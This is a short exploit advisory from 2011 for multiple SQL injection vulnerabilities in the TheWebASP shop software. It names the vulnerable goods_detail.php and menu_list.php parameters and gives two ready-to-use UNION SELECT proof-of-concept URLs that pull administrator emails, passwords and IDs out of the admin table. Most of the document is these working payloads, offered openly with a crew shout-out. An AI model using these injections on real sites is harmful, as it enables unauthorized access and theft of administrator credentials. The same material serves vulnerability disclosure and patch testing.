# Exploit Title: TheWebASP - Multiple SQL Injection vulnerabilities
# Date: 8/17/2011
# Author: Robert Cooper (admin[at]websiteauditing.org)
# Software Link: http://www.thewebasp.com
# Tested on: [Linux/Windows 7]
#Vulnerable Parameters:
 
goods_detail.php?cid=
goods_detail.php?gid=
menu_list.php?cid=

 
##############################################################
PoC:
 
http://www.example.com/goods_detail.php?gid=4031&cid=-1 union all select group_concat(adminEmail,0x3a,adminPwd,0x3a,adminId),2,3,4,5,6,7,8,9,10,11,12 FROM admin--
http://www.example.com/menu_list.php?cid=-99 union all select 1,2,3,4,group_concat(adminEmail,0x3a,adminPwd,0x3a,adminId),6,7 FROM admin--
 
##############################################################
www.websiteauditing.org
www.areyousecure.net
 
# Shouts to the Belegit crew